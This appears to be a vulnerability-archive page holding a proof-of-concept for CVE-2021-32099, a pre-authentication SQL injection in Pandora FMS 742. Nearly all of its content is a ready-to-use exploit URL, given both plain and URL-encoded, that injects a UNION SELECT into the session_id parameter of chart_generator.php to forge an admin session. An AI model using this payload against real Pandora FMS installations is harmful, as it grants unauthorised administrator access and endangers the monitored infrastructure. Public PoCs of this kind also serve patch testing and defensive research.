CVE-2021-32099 PoC — Artica Pandora FMS SQL注入漏洞

Source

Associated Vulnerability

Description

CVE-2021-32099

Readme

# CVE-2021-32099

## pandora fms 742 sqli (pre authentication) POC
```
http://localhost/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1
```

`URL Encoded`
```
http://localhost/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271
```

File Snapshot

 [4.0K]  /data/pocs/0f3f1c7b082690f1547088533bbf28e41dd83a5b
└── [ 456]  README.md

0 directories, 1 file

Remarks